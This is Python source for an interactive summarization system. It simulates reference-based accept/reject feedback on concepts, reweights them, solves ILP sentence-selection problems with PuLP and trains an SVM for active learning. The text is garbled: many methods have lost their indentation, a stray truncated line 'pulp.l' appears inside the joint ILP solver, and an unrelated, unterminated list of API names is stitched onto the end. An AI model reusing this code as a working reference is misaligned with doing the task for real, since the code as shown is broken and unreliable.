        elif recommender == RECOMMENDER_METHOD_SAMPLING:
            use_samples = random.sample(samples, self.allowed_number_of_feedback_per_iteration)
        elif recommender == RECOMMENDER_METHOD_HIGHEST_WEIGHT:
            use_samples = self.recommend_highest_weight(samples, self.allowed_number_of_feedback_per_iteration);
        # oracle judgement minus everything already recorded in earlier rounds
        new_rejects = list(self.Oracle.reject_concepts(use_samples, references) - self.flight_recorder.union().reject)
        new_accepts = list(self.Oracle.accept_concepts(use_samples, references) - self.flight_recorder.union().accept)
        # drop stopword-only / low-quality ngrams before reporting
        new_rejects = prune_ngrams(new_rejects, self.stoplist, self.N)
        new_accepts = prune_ngrams(new_accepts, self.stoplist, self.N)
        '''
        if self.parse_type == 'parse':
            self.recorder.total_accept_keys += self.project_phrase_ngrams(self.recorder.accepted_concepts)
            self.recorder.total_reject_keys += self.project_phrase_ngrams(self.recorder.rejected_concepts)
            x = list(Set(self.recorder.total_accept + self.recorder.union.reject))
            new_implicit_rejects = list(self.get_implicit_feedback(summ_ngrams, x) - Set(self.recorder.total_implicit_reject))
            # self.recorder.total_implicit_reject += self.recorder.latest().implicit_reject
        '''
        # self.recorder.total_accept += self.recorder.accepted_concepts
        # self.recorder.total_reject += self.recorder.rejected_concepts
        # self.recorder.total_implicit_reject += self.recorder.latest().implicit_reject
        return (new_accepts, new_rejects, new_implicit_rejects)
def recommend_highest_weight(self, samples, limit=1, prune=True):
w = dict(self.graph.get_weights())
s = sorted(w, key=w.get, reverse=True)
s = [item for item in s if 0.0 < w.get(item) < 1.0
and item not in self.flight_recorder.union().reject
and item not in self.flight_recorder.union().accept
and item not in self.flight_recorder.union().implicit_reject]
pruned = prune_ngrams(s, self.stoplist, self.N)
result =[]
for concept in s:
if concept in samples:
# print ("adding %s with weight %s to result" % (concept, w[concept]))
result.append(concept)
return result[:limit]
def partial_feedback(self, ngrams_list):
return [ngram for ngram in ngrams_list if self.summarizer.weights[ngram] > 1]
def change_weights(self, concept_list, oracle_type):
for key in concept_list:
if oracle_type == CHANGE_WEIGHT_MODE_REJECT:
self.summarizer.weights[key] = 0.0
if oracle_type == CHANGE_WEIGHT_MODE_ACCEPT:
self.summarizer.weights[key] = self.MAX_WEIGHT
    def recalculate_weights(self, oracle_type, propagation=False):
        """
        Set new weights in self.summarizer.weights according to the currently selected feedback method.
        This method basically interprets the feedback. If propagation is False, it uses the default model, which
        changes weights based on the FlightRecorder feedback. If propagation is True, changing weights is based
        on graph traversal.
        :param oracle_type: feedback-interpretation strategy; forwarded to the weight-update helpers
        :param propagation: False -> baseline per-concept update; True -> feedback-graph propagation
        """
        # if the graph exists, we need to update it using EXACTLY the same data as the other oracles used.
        if propagation is False:
            self.__update_summarizer_weights_baseline__(oracle_type)
        elif propagation is True:
            # Fold the recorded feedback into the graph before reading weights from it.
            self.graph.incorporate_feedback(self.flight_recorder)
            self.__update_summarizer_weights_using_graph__(oracle_type);
            # change weights using the feedbackgraph
        else:
            # Only reachable when `propagation` is neither True nor False (non-bool value).
            print("recalculate weights is broken!");
def __update_summarizer_weights_using_graph__(self, oracle_type=""):
"""
"""
if self.graph is None:
raise StandardError("Set to propagation, but no coocurrence_graph is given")
G = self.graph
weights = self.summarizer.weights
for (concept, weight) in G.get_weights():
if weights.has_key(concept):
weights[concept] = weight * self.MAX_WEIGHT
elif weight > 1:
print("ignoring unknown key: " , concept, " with weight ", weight)
    def __update_summarizer_weights_baseline__(self, oracle_type):
        """
        The original method to update weights: Rejected concepts get weight ZERO, Accepted concepts get weight ONE
        (i.e. MAX_WEIGHT via change_weights).
        :param oracle_type: one of the ORACLE_TYPE_* constants selecting the update strategy
        :return: None (mutates self.summarizer.weights in place)
        """
        # self.summarizer.weights = __convert_graph_to_weights__()
        # REJECT_ALL: zero out everything ever rejected (plus implicit rejects in phrase mode).
        if oracle_type == ORACLE_TYPE_REJECT_ALL:
            self.change_weights(self.flight_recorder.union().reject, CHANGE_WEIGHT_MODE_REJECT)
            if self.parse_type == PARSE_TYPE_PARSE:
                self.change_weights(self.flight_recorder.union().implicit_reject, CHANGE_WEIGHT_MODE_REJECT)
        # ACCEPT_ALL: boost everything ever accepted.
        if oracle_type == ORACLE_TYPE_ACCEPT_ALL:
            self.change_weights(self.flight_recorder.union().accept, CHANGE_WEIGHT_MODE_ACCEPT)
        # ACCEPT_REJECT / ILP_FEEDBACK / ACTIVE_LEARNING*: apply only the LATEST round of feedback.
        if oracle_type == ORACLE_TYPE_ACCEPT_REJECT \
                or oracle_type == ORACLE_TYPE_ILP_FEEDBACK \
                or oracle_type.startswith(ORACLE_TYPE_ACTIVE_LEARNING):
            if self.parse_type == None:
                print('Weight change', oracle_type)
                self.change_weights(self.flight_recorder.latest().reject, CHANGE_WEIGHT_MODE_REJECT)
                self.change_weights(self.flight_recorder.latest().accept, CHANGE_WEIGHT_MODE_ACCEPT)
            if self.parse_type == PARSE_TYPE_PARSE:
                # Phrase mode: feedback is on phrases, so project it down to ngram keys first.
                self.change_weights(self.project_phrase_ngrams(self.flight_recorder.latest().reject),
                                    CHANGE_WEIGHT_MODE_REJECT)
                self.change_weights(self.project_phrase_ngrams(self.flight_recorder.latest().accept),
                                    CHANGE_WEIGHT_MODE_ACCEPT)
                self.change_weights(self.flight_recorder.latest().implicit_reject, CHANGE_WEIGHT_MODE_REJECT)
        # KEEPTRACK: latest rejects are zeroed; the treatment of accepts depends on whether
        # the latest round contained any accepts.
        if oracle_type == ORACLE_TYPE_KEEPTRACK:
            if self.parse_type == None:
                self.change_weights(self.flight_recorder.latest().reject, CHANGE_WEIGHT_MODE_REJECT)
                if self.flight_recorder.latest().accept:
                    # NOTE(review): accepted concepts are REJECTED here when the latest round
                    # had accepts — looks intentional for this strategy, but confirm.
                    self.change_weights(self.flight_recorder.union().accept, CHANGE_WEIGHT_MODE_REJECT)
                else:
                    self.change_weights(self.flight_recorder.union().accept, CHANGE_WEIGHT_MODE_ACCEPT)
            if self.parse_type == PARSE_TYPE_PARSE:
                self.change_weights(self.project_phrase_ngrams(self.flight_recorder.latest().reject),
                                    CHANGE_WEIGHT_MODE_REJECT)
                self.change_weights(self.flight_recorder.latest().implicit_reject, CHANGE_WEIGHT_MODE_REJECT)
                if self.flight_recorder.latest().accept:
                    self.change_weights(self.project_phrase_ngrams(self.flight_recorder.latest().accept),
                                        CHANGE_WEIGHT_MODE_ACCEPT)
                else:
                    self.change_weights(self.project_phrase_ngrams(self.flight_recorder.union().accept),
                                        CHANGE_WEIGHT_MODE_ACCEPT)
        # TOP_N: reset to the initial weights, apply all feedback, then keep only the
        # top 400 sorted concepts (everything else is zeroed).
        if oracle_type == ORACLE_TYPE_TOP_N:
            self.summarizer.weights = self.initial_weights
            self.change_weights(self.flight_recorder.union().reject, CHANGE_WEIGHT_MODE_REJECT)
            self.change_weights(self.flight_recorder.union().accept, CHANGE_WEIGHT_MODE_ACCEPT)
            if self.flight_recorder.union().accept:
                sorted_weights = self.get_sorted_concepts()
                for key in self.summarizer.weights:
                    if key not in sorted_weights[:400]:
                        self.summarizer.weights[key] = 0
    def get_details(self, iteration, summary_length, oracle_type):
        """
        Get details about an ilp iteration. It solves the ILP with the current weights, extracts the
        resulting summary, scores it with ROUGE, and appends a result row to self.info_data.
        :param iteration: iteration number, recorded in the output row
        :param summary_length: word budget for the summary
        :param oracle_type: unused here; kept for call-site symmetry
        :return: (summary, score, subset) — list of sentence strings, ROUGE score tuple,
            and the set of selected sentence indices
        """
        # Diagnostic: total (T) and latest (L) feedback counts, split into accepts (A) and rejects (R).
        print("flight rec: (T: %s = A: %s + R: %s ), (L: %s = A: %s + R: %s)" %
              (len(self.flight_recorder.union().accept | self.flight_recorder.union().reject),
               len(self.flight_recorder.union().accept),
               len(self.flight_recorder.union().reject),
               len(self.flight_recorder.latest().accept | self.flight_recorder.latest().reject),
               len(self.flight_recorder.latest().accept),
               len(self.flight_recorder.latest().reject)))
        # solve the ilp model
        value, subset = self.summarizer.solve_ilp_problem(summary_size=int(summary_length), units="WORDS")
        summary = [self.summarizer.sentences[j].untokenized_form for j in subset]
        summary_text = '\n'.join(summary)
        score = self.rouge(summary_text, self.models, self.summary_length)
        accepted = self.flight_recorder.latest().accept
        rejected = self.flight_recorder.latest().reject
        # Row layout: iteration, ROUGE-1/2/SU4, #accepts, #rejects, summary text.
        row = [str(iteration), score[0], score[1], score[2], len(accepted), len(rejected),
               summary_text]
        #self.summarizer.weights = old_weights
        # Print everything except the (long) summary text.
        print(row[:-1])
        # print(summary_text.encode('utf-8'))
        self.info_data.append(row)
        return summary, score, subset
def check_break_condition(self, iteration, prev_summary, summary, ub_summary, prev_score):
if not self.flight_recorder.latest().accept and not self.flight_recorder.latest().reject:
print("BREAKING HERE: Stopping because last flight_recorder is basically empty")
return 1
if self.score[1] >= self.ub_score[1]: # ROUGE2 score> Upper-bound
print("BREAKING HERE: current summary is BETTER than UB")
return 1
if summary == ub_summary:
print("BREAKING HERE: Found UB summary")
return 1
if self.ub_score == self.score:
print("BREAKING HERE: score is equal to UB score")
return 1
return 0
def solve_joint_ilp(self, summary_size, feedback, non_feedback, uncertainity={}, labels={}, unique=False, solver='glpk', excluded_solutions=[]):
"""
:param summary_size: The size of the backpack. i.e. how many words are allowed in the summary.
:param feedback:
:param non_feedback:
:param unique: if True, an boudin_2015 eq. (5) is applied to enforce a unique solution.
:param solver: cplex, if fails use the mentioned solver
:param excluded_solutions:
:return: (val, set) tuple (int, list): the value of the objective function and the set of
selected sentences as a tuple.
"""
w = self.summarizer.weights
u = uncertainity
L = summary_size
NF = len(non_feedback)
F = len(feedback)
S = len(self.summarizer.sentences)
if not self.summarizer.word_frequencies:
self.summarizer.compute_word_frequency()
tokens = self.summarizer.word_frequencies.keys()
f = self.summarizer.word_frequencies
T = len(tokens)
# HACK Sort keys
# concepts = sorted(self.weights, key=self.weights.get, reverse=True)
# formulation of the ILP problem
prob = pulp.LpProblem(self.summarizer.input_directory, pulp.LpMaximize)
# initialize the concepts binary variables
nf = pulp.LpVariable.dicts(name='nf',
indexs=range(NF),
lowBound=0,
upBound=1,
cat='Integer')
f = pulp.LpVariable.dicts(name='F',
indexs=range(F),
lowBound=0,
upBound=1,
cat='Integer')
# initialize the sentences binary variables
s = pulp.LpVariable.dicts(name='s',
indexs=range(S),
lowBound=0,
upBound=1,
cat='Integer')
# initialize the word binary variables
t = pulp.LpVariable.dicts(name='t',
indexs=range(T),
lowBound=0,
upBound=1,
cat='Integer')
# OBJECTIVE FUNCTION
if labels:
print('solve for Active learning 2')
prob += pulp.lpSum(w[non_feedback[i]] * (1.0 - u[non_feedback[i]]) * labels[non_feedback[i]] * nf[i] for i in range(NF))
if not labels:
if uncertainity:
print('solve for Active learning')
if feedback:
# In this phase, we force new concepts to be chosen, and not those we already have feedback on, and
# therefore non_feedback is added while feedback is substracted from the problem. I.e. by
# substracting the feedback, those sentences will disappear from the solution.
prob += pulp.lpSum(w[non_feedback[i]] * u[non_feedback[i]] * nf[i] for i in range(NF)) - pulp.lpSum(
w[feedback[i]] * u[feedback[i]] * f[i] for i in range(F))
pulp.l
else:
prob += pulp.lpSum(w[non_feedback[i]] * u[non_feedback[i]] * nf[i] for i in range(NF))
if not uncertainity:
print('solve for ILP feedback')
if feedback:
prob += pulp.lpSum(w[non_feedback[i]] * nf[i] for i in range(NF)) - pulp.lpSum(w[feedback[i]] * f[i] for i in range(F))
else:
prob += pulp.lpSum(w[non_feedback[i]] * nf[i] for i in range(NF))
if unique:
prob += pulp.lpSum(w[non_feedback[i]] * nf[i] for i in range(NF)) - pulp.lpSum(w[feedback[i]] * f[i] for i in range(F)) + \
10e-6 * pulp.lpSum(f[tokens[k]] * t[k] for k in range(T))
# CONSTRAINT FOR SUMMARY SIZE
prob += pulp.lpSum(s[j] * self.summarizer.sentences[j].length for j in range(S)) <= L
# INTEGRITY CONSTRAINTS
for i in range(NF):
for j in range(S):
if non_feedback[i] in self.summarizer.sentences[j].concepts:
prob += s[j] <= nf[i]
for i in range(NF):
prob += pulp.lpSum(s[j] for j in range(S)
if non_feedback[i] in self.summarizer.sentences[j].concepts) >= nf[i]
for i in range(F):
for j in range(S):
if feedback[i] in self.summarizer.sentences[j].concepts:
prob += s[j] <= f[i]
for i in range(F):
prob += pulp.lpSum(s[j] for j in range(S)
if feedback[i] in self.summarizer.sentences[j].concepts) >= f[i]
# WORD INTEGRITY CONSTRAINTS
if unique:
for k in range(T):
for j in self.summarizer.w2s[tokens[k]]:
prob += s[j] <= t[k]
for k in range(T):
prob += pulp.lpSum(s[j] for j in self.summarizer.w2s[tokens[k]]) >= t[k]
# CONSTRAINTS FOR FINDING OPTIMAL SOLUTIONS
for sentence_set in excluded_solutions:
prob += pulp.lpSum([s[j] for j in sentence_set]) <= len(sentence_set) - 1
# prob.writeLP('test.lp')
# solving the ilp problem
try:
print('Solving using CPLEX')
prob.solve(pulp.CPLEX(msg=0))
except:
print('Fallback to mentioned solver')
if solver == 'gurobi':
prob.solve(pulp.GUROBI(msg=0))
elif solver == 'glpk':
prob.solve(pulp.GLPK(msg=0))
else:
sys.exit('no solver specified')
# retreive the optimal subset of sentences
solution = set([j for j in range(S) if s[j].varValue == 1])
# returns the (objective function value, solution) tuple
return (pulp.value(prob.objective), solution)
    def get_feature_vector(self):
        """
        Assign each concept a vector in word2vec space that is the mean of its constituting words.
        Populates self.uncertainity, self.concept_vec_idx, self.index_vec_concept and self.fvector.
        :return: None (results are stored on self)
        """
        '''
        corpus = [' '.join(doc) for _, doc in docs]
        vectorizer = TfidfVectorizer(min_df=1)
        X = vectorizer.fit_transform(corpus)
        idf = vectorizer._tfidf.idf_
        tf_idf = dict(zip(vectorizer.get_feature_names(), idf))
        print tf_idf
        '''
        index = 0
        self.uncertainity, self.concept_vec_idx = {}, {}
        self.fvector = []
        unknown_l, hit_l = [], []
        for i in range(len(self.summarizer.sentences)):
            '''
            print(self.summarizer.sentences[i].concepts)
            print(self.summarizer.sentences[i].untokenized_form)
            print(self.summarizer.sentences[i].tokens_pos)
            '''
            # for each concept
            for concept in self.summarizer.sentences[i].concepts:
                #print(self.summarizer.sentences[i].untokenized_form)
                pos_map = [0.0, 0.0, 0.0, 0.0, 0.0] #NN, VB, JJ, ADV, Others
                if concept not in self.concept_vec_idx:
                    ngram = concept.split(' ')
                    is_capital, is_num, stopword, pos_list, concept_tf, embd = 0, 0, 0, [], [], []
                    for token in ngram:
                        # Look the token up in the sentence's token::POS map; on failure,
                        # strip trailing/hyphenated punctuation and retry, finally falling
                        # back to a guessed POS ('CD' for numbers, else 'NN').
                        try:
                            word, pos = self.summarizer.sentences[i].tokens_pos[token].split('::')
                        except:
                            token = re.sub(u'[-\.](\s|$)', u'\\1', token)
                            token = re.sub(u'([^.])[.]$', u'\\1', token)
                            try:
                                word, pos = self.summarizer.sentences[i].tokens_pos[token].split('::')
                            except:
                                if token.isnumeric():
                                    word, pos = token, 'CD'
                                else:
                                    word, pos = token, 'NN'
                        if word.istitle():
                            is_capital += 1
                        """
                        if pos == 'CD':
                            is_num += 1
                        if re.match('N.*', pos):
                            pos_map[0] = 1.0
                        if re.match('V.*', pos):
                            pos_map[1] = 1.0
                        if re.match('JJ.*|', pos):
                            pos_map[1] = 1.0
                        """
                        #print(token,)
                        if token in self.stoplist:
                            stopword += 1
                        if token in self.summarizer.word_frequencies:
                            concept_tf.append(self.summarizer.word_frequencies[token])
                        if token not in self.stoplist:
                            word_l = word.lower()
                            # Embedding lookup: direct hit, else split on '-' and look up
                            # parts, else fall back to the language's unknown-word vector.
                            if word_l in self.embeddings.vocab_dict:
                                embd_val = self.embeddings.W[self.embeddings.vocab_dict[word_l]]
                                hit_l.append(word_l)
                                embd.append(embd_val.tolist())
                            else:
                                joint_words = word_l.split('-')
                                for j_word in joint_words:
                                    j_word = unicode(j_word)
                                    if j_word in self.embeddings.vocab_dict:
                                        embd_val = self.embeddings.W[self.embeddings.vocab_dict[j_word]]
                                        hit_l.append(j_word)
                                        embd.append(embd_val.tolist())
                                    else:
                                        if self.language == "english":
                                            embd_val = self.embeddings.W[self.embeddings.vocab_dict[u"unk"]]
                                        if self.language == "german":
                                            embd_val = self.embeddings.W[self.embeddings.vocab_dict[u"unknown"]]
                                        unknown_l.append(unicode(word_l))
                                        embd.append(embd_val.tolist())
                    # Intern the POS-sequence key into a small integer id.
                    pos_key = '_'.join(pos_list)
                    if pos_key in self.pos_hash:
                        pos_val = self.pos_hash[pos_key]
                    else:
                        pos_val = len(self.pos_hash) + 1
                        self.pos_hash[pos_key] = pos_val
                    if concept_tf == []:
                        concept_tf = [1]
                    # calculate concept vector as the mean of its constituent word vectors.
                    if concept not in self.concept_vec_idx:
                        if not embd:
                            # No embeddings collected (all tokens were stopwords):
                            # fall back to the unknown-word vector.
                            print(embd, concept)
                            if self.language == "english":
                                embd_val = self.embeddings.W[self.embeddings.vocab_dict[u"unk"]]
                            if self.language == "german":
                                embd_val = self.embeddings.W[self.embeddings.vocab_dict[u"unknown"]]
                            embd.append(embd_val.tolist())
                        vector = np.mean(np.array(embd), axis=0)
                        # Append -1 as the (still unlabeled) label column.
                        vector = np.append(vector, np.array([-1]), axis=0)
                        self.fvector.append(vector.tolist())
                        """
                        self.fvector.append([1.0 * self.summarizer.weights[concept]/self.cluster_size,
                                             is_capital,
                                             pos_val,
                                             stopword,
                                             np.mean(np.array(concept_tf)),
                                             is_num])
                        """
                        self.uncertainity[concept] = 1.0
                        self.concept_vec_idx[concept] = index
                        self.index_vec_concept[index] = concept
                        index += 1
        hit_l, unknown_l = set(hit_l), set(unknown_l)
        hit, unknown = len(hit_l), len(unknown_l)
        print('size of the feature vector: %d' % len(self.fvector))
        print('hit concepts: %d, unknown concepts: %d' % (hit, unknown))
        print('hit ratio: %f, unknown ratio: %f' % (1.0 * hit/(hit+unknown), 1.0 * unknown/(hit+unknown)))
        print('Unknown words', ','.join(unknown_l))
def change_labels(self, feedback_list, label):
for concept in feedback_list:
# print(concept, self.summarizer.weights[concept])
vec_index = self.concept_vec_idx[concept]
self.data[vec_index, -1] = label
def project_phrase_ngrams(self, concept_list):
feedback_keys = []
for phrase in concept_list:
for key in self.summarizer.weights:
if re.search(u'(\s|^)%s([\s]|$)' % (key), u'%s' % (phrase)) or re.search(u'(\s|^)%s([\s]|$)' % (phrase),
u'%s' % (key)):
# print(key, phrase)
feedback_keys.append(key)
return feedback_keys
    def get_uncertainity_labels(self, model):
        """Train ``model`` on the concepts with feedback and predict labels/uncertainty
        for the rest.

        Labeled rows (feedback accept=1 / reject=0) get uncertainty 0.0 and their stored
        label; unlabeled rows get the classifier's prediction and 1 - max(probability).
        If training fails (e.g. only one class present), all unlabeled rows fall back to
        uncertainty 1.0 and label 1.0.

        :param model: a scikit-learn-style classifier with fit/predict/predict_proba
        :return: (concept_u, concept_labels) dicts keyed by concept
        """
        '''
        if self.parse_type == PARSE_TYPE_PARSE:
            #print('Accept keys:', self.recorder.total_accept_keys)
            self.change_labels(self.recorder.total_accept_keys, label=1)
            self.change_labels(self.recorder.union().reject_keys, label=0)
            self.change_labels(self.recorder.union().implicit_reject, label=0)
        if self.parse_type == None:
        '''
        self.change_labels(self.flight_recorder.union().accept, label=1)
        self.change_labels(self.flight_recorder.union().reject, label=0)
        # Last column holds the label (-1 = unlabeled); column 0 is skipped for features.
        Y = self.data[:, -1]
        X = self.data[:, 1:-1]
        UL_indexes = np.where(Y == -1)
        L_indexes = np.where(Y > -1)
        X_train, Y_train = X[L_indexes], Y[L_indexes]
        X_unlabeled, _ = X[UL_indexes], Y[UL_indexes]
        flag = 0
        try:
            model.fit(X_train, Y_train)
            UL_probs = model.predict_proba(X_unlabeled)
            UL = model.predict(X_unlabeled)
        except: # If there are no Accepts [training data has only one class]
            flag = 1
        concept_u, concept_labels = {}, {}
        # `index` walks the unlabeled predictions in row order; this relies on
        # index_vec_concept iterating in ascending row order (keys inserted 0..n).
        index = 0
        for vec_index in self.index_vec_concept:
            concept = self.index_vec_concept[vec_index]
            if vec_index not in UL_indexes[0]:
                concept_u[concept] = 0.0
                concept_labels[concept] = self.data[vec_index, -1]
            else:
                if flag == 0:
                    prob = UL_probs[index]
                    concept_u[concept] = 1 - prob.max()
                    concept_labels[concept] = UL[index]
                else: # If there are no Accepts [training data has only one class]
                    concept_u[concept] = 1.0
                    concept_labels[concept] = 1.0
                index += 1
        return concept_u, concept_labels
    def __call__(self, docs, models, summary_length, oracle_type, ub_score, ub_summary, parser_type=None, parse_info=[],
                 max_iteration_count=11, weights_override={}, clear_before_override=None, propagation=False):
        """
        This starts off the simulated feedback for a single cluster of documents, towards a list of models, i.e. the
        models get united, and then the feedback loop is simulated.
        :param docs: document cluster to summarize
        :param models: (model_name, model) reference summaries used as the oracle's ground truth
        :param summary_length: word budget for the summary
        :param oracle_type: ORACLE_TYPE_* constant selecting the feedback strategy
        :param ub_score: ROUGE score of the upper-bound summary (used as a stop condition)
        :param ub_summary: the upper-bound summary itself (used as a stop condition)
        :param parser_type: None for ngram concepts, PARSE_TYPE_PARSE for phrase concepts
        :param parse_info: parse trees, only used when parser_type == PARSE_TYPE_PARSE
        :param max_iteration_count: int: Maximum number of iterations to run.
        :param weights_override: dict: (concept -> double) dictionary containing the override weights for propagation
        :param clear_before_override: if not None, reset all weights to this value before overriding
        :param propagation: forwarded to recalculate_weights (graph propagation vs. baseline)
        :return: the final summary (list of sentence strings)
        """
        self.models = models
        self.summary_length = summary_length
        self.ub_score = ub_score
        self.parse_type = parser_type
        self.cluster_size = len(docs)
        self.MAX_WEIGHT = len(docs)
        # Collect reference ngrams (and phrases, in parse mode) from all model summaries.
        for model_name, model in models:
            y = set(extract_ngrams2(model, self.stemmer, self.language, self.N))
            self.ref_ngrams = self.ref_ngrams.union(y)
            if parser_type == PARSE_TYPE_PARSE:
                for _, parse_sents in parse_info[1]:
                    for parse_sent in parse_sents:
                        _, phrases = get_parse_info(parse_sent, self.stemmer, self.language, self.stoplist)
                        y = set(prune_phrases(phrases, self.stoplist, self.stemmer, self.language))
                        self.ref_phrases = self.ref_phrases.union(y)
        self.summarizer.sentences = self.SumeWrap.load_sume_sentences(docs, parser_type, parse_info)
        parse_info = []
        # extract bigrams as concepts
        if self.parse_type == PARSE_TYPE_PARSE:
            print('Get concept types Phrases')
            self.summarizer.extract_ngrams2(concept_type='phrase')
        if self.parse_type == None:
            print('Get concept types ngrams')
            self.summarizer.extract_ngrams2(concept_type='ngrams')
        # compute document frequency as concept weights
        self.summarizer.compute_document_frequency()
        # compute word_frequency
        self.summarizer.compute_word_frequency()
        old_sentences = self.summarizer.sentences
        self.summarizer.prune_sentences(remove_citations=True, remove_redundancy=True, imp_list=[])
        # from all concepts that are going to be pruned, keep only those that also appear elsewhere
        retained_concepts = [concept for s in self.summarizer.sentences for concept in s.concepts]
        print('Total concepts before sentence pruning: ', len(self.summarizer.weights))
        # Drop weights for concepts that only occurred in pruned sentences.
        for sentence in set(old_sentences).difference(self.summarizer.sentences):
            for concept in sentence.concepts:
                if concept not in retained_concepts and self.summarizer.weights.has_key(concept):
                    del self.summarizer.weights[concept]
        print('Total concepts found: ', len(self.summarizer.weights))
        # Report how many of the summarizer's concepts occur in the references
        # (= the oracle's maximum possible accepts).
        if self.parse_type == None:
            concept_match = [key for key in self.summarizer.weights if key in self.ref_ngrams]
            print('Total ref concepts: ', len(self.ref_ngrams))
        elif self.parse_type == PARSE_TYPE_PARSE:
            concept_match = [key for key in self.summarizer.weights if key in self.ref_phrases]
            print('Total ref concepts: ', len(self.ref_phrases))
        print('UB Accept concepts: ', len(concept_match))
        if oracle_type.startswith(ORACLE_TYPE_ACTIVE_LEARNING):
            self.get_feature_vector()
            self.data = np.array(self.fvector)
            model = svm.SVC(kernel='linear', C=1.0, probability=True, class_weight='balanced')
        self.initial_weights = self.summarizer.weights
        self.__apply_initial_weights_override__(weights_override, clear_before_override)
        '''
        # create the coocurence graph
        self.graph.clear()
        self.graph.add_sentences(self.summarizer.sentences)
        dump_dir=tempfile.mkdtemp(dir=self.debug_dump_target_dir)
        '''
        print('Summarizing %s sentences down to %s words' % (len(self.summarizer.sentences), self.summary_length))
        # core algorithm for feedback calculation... (as in paper)
        flag = 0
        # get_details is the personalizedSummary function which gets updated weights in every iteration.
        # Starting with boudin as starting weights (except in case of weights_override != None).
        # initial iteration
        summary, self.score, subset = self.get_details(1, summary_length, oracle_type)
        self.prev_score = (0.0, 0.0, 0.0)
        prev_summary = ''
        for iteration in range(2, max_iteration_count):
            self.dump_current_weight_map(self.debug_dump_target_dir, max_iteration_count)
            # here, depending on the oracle_type, a intermediate summary is generated. This intermediate summary
            # satisfies other optimization criteria, so that the amount/probability of getting useful feedback is maximized
            if iteration > 2:
                subset = self.__generate_optimal_feedback_summary__(flag, oracle_type, summary_length)
            print('Summary Subset:', subset)
            # acquire feedback and record it using the flight_recorder
            #new_accepts, new_rejects, new_implicits = self.get_feedback(subset, RECOMMENDER_METHOD_HIGHEST_WEIGHT)
            new_accepts, new_rejects, new_implicits = self.get_feedback(subset)
            self.flight_recorder.record(new_accepts, new_rejects, new_implicits)
            # update the summarizer weights for next iteration
            self.recalculate_weights(oracle_type, propagation)
            summary, self.score, _ = self.get_details(iteration, summary_length, oracle_type)
            if oracle_type.startswith(ORACLE_TYPE_ACTIVE_LEARNING):
                self.uncertainity, self.labels = self.get_uncertainity_labels(model)
            if self.check_break_condition(iteration, prev_summary, summary, ub_summary, self.prev_score):
                break
            self.prev_score = self.score
            prev_summary = summary
        return summary
    def __generate_optimal_feedback_summary__(self, flag, oracle_type, summary_length):
        """
        Generates a summary which is optimal for getting feedback on. This is done by increasing the probability of
        generating a summary with unknown concepts in it. This is achieved by setting the concept weights of known
        concepts (either positivly or negativly rated) to ZERO.
        TODO check if :param subset is neccessary for this method
        :param flag: 1 forces the plain ILP; NOTE(review): reassigning it below does NOT
            propagate back to the caller (plain parameter), so the force-flag never sticks
            across iterations — confirm whether that is intended.
        :param oracle_type: ORACLE_TYPE_* constant selecting which joint ILP variant to use
        :param summary_length: word budget for the summary
        :return: set of selected sentence indices
        """
        if oracle_type == ORACLE_TYPE_ILP_FEEDBACK or oracle_type.startswith(ORACLE_TYPE_ACTIVE_LEARNING):
            feedback = self.flight_recorder.union().accept | self.flight_recorder.union().reject
            """
            if self.parse_type == PARSE_TYPE_PARSE:
                feedback = self.project_phrase_ngrams(feedback)
            """
            non_feedback = self.summarizer.weights.viewkeys() - feedback
            print("GeOpFeSu: Feedback Size:", len(feedback), len(non_feedback),
                  'Total:', len(self.summarizer.weights.keys()))
            # Use the joint ILP only while feedback is still flowing (or none exists yet).
            if (self.flight_recorder.latest().accept or len(feedback) == 0) and flag == 0:
                if oracle_type == ORACLE_TYPE_ILP_FEEDBACK:
                    _, subset = self.solve_joint_ilp(int(summary_length), list(feedback), list(non_feedback))
                if oracle_type == ORACLE_TYPE_ACTIVE_LEARNING:
                    _, subset = self.solve_joint_ilp(int(summary_length), list(feedback), list(non_feedback), self.uncertainity)
                if oracle_type == ORACLE_TYPE_ACTIVE_LEARNING2:
                    _, subset = self.solve_joint_ilp(int(summary_length), list(feedback), list(non_feedback), self.uncertainity, self.labels)
                    print('Subset after AL2', subset)
                # Empty joint-ILP solution: fall back to the plain ILP.
                if not subset:
                    flag = 1
                    print('Solving regular ILP')
                    _, subset = self.summarizer.solve_ilp_problem(summary_size=int(summary_length), units="WORDS")
            else:
                print('Solving regular ILP')
                _, subset = self.summarizer.solve_ilp_problem(summary_size=int(summary_length), units="WORDS")
        else:
            print('Solving regular ILP')
            _, subset = self.summarizer.solve_ilp_problem(summary_size=int(summary_length), units="WORDS")
        return subset
def __apply_initial_weights_override__(self, weights_override={}, clear_before_override=None):
"""
:param clear_before_override: bool: if True, all weights are set to a default value, no matter what.
:param weights_override:
"""
if (weights_override):
if clear_before_override is not None:
print("Clearing summarizer weights")
for k, v in self.summarizer.weights.iteritems():
self.summarizer.weights[k] = float(clear_before_override)
print("Overriding weights")
for k, v in weights_override.iteritems():
if self.summarizer.weights.has_key(k):
print("Overriding summarizer weight for '%s' with '%s' (was '%s')" % (
k, v, self.summarizer.weights[k]))
self.summarizer.weights[k] = v
def dump_current_weight_map(self, dump_dir=tempfile.mkdtemp(), iteration=0):
"""
:param dump_dir: directory (has to exist) where the weight map should be stored.
:param iteration: current iteration
@type dump_dir: str
@type iteration: int
"""
json_content = json.dumps(self.summarizer.weights)
prefix = "weights-%s-" % iteration
_, file = tempfile.mkstemp(suffix=".json", prefix=prefix, dir=dump_dir)
print("Dumping weights to %s" % file)
write_to_file(json_content, file)
| [
"random.sample",
"json.dumps",
"sklearn.svm.SVC",
"pulp.lpSum",
"os.path.abspath",
"summarizer.utils.data_helpers.get_parse_info",
"tempfile.mkdtemp",
"summarizer.utils.data_helpers.prune_phrases",
"pulp.LpProblem",
"itertools.chain",
"re.search",
"re.sub",
"pulp.CPLEX",
"pulp.value",
